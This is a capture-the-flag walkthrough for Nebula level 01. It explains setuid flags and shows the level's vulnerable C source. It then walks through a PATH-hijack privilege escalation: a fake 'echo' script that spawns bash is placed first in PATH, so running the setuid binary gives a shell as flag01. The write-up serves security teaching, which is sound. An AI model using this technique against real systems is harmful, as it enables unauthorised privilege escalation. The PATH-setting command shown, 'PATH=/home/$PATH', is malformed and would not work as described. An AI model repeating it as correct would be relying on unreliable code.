Nebula Series - Level 01

20 Apr 2020

setuid and setgid are unix flags that allow us to run an executable with the permissions of the executable’s owner or group. Improperly designed setuid executables can be used for privilege escalation.

Inspecting the flag01 users home directory, we see a single executable named /flag01

We can check the permissions with

$ stat -c "%a" /home/flag01/flag01

4750

The leading 4 indicates that the setuid permission is set.

Alternatively we can run ls -l and look for an ‘s’ in the executable position of the user permissions.

$ ls -l /home/flag01

-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 /home/flag01/flag01

Here we also see that the owner is flag01.

To make things a little easier for us, we’re also provided with the source code.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/usr/bin/env echo and now what?");
}

We can see the application sets our real user id and group id using setresgid and setresuid to our effective user id and group id which it gets with getegid and geteuid. Then it calls “echo” using system().

The question is, which echo? Well, we can influence that by modifying our path.

Let’s create a new file named echo in our home directory with the following contents

#!/bin/bash

/bin/bash

Make sure it’s executable with

$ chmod +x /home/level01/echo

Add our home directory to the front of our PATH so that our echo is the one that gets run

$ PATH=/home/$PATH

All that’s left is to run the flag01 executable

$ /home/flag01/flag01

and we will be presented with a bash shell as the flag01 user. To complete the level we use our escalated privileges to run getflag

$ getflag

"You have successfully executed getflag on a target account"

In summary: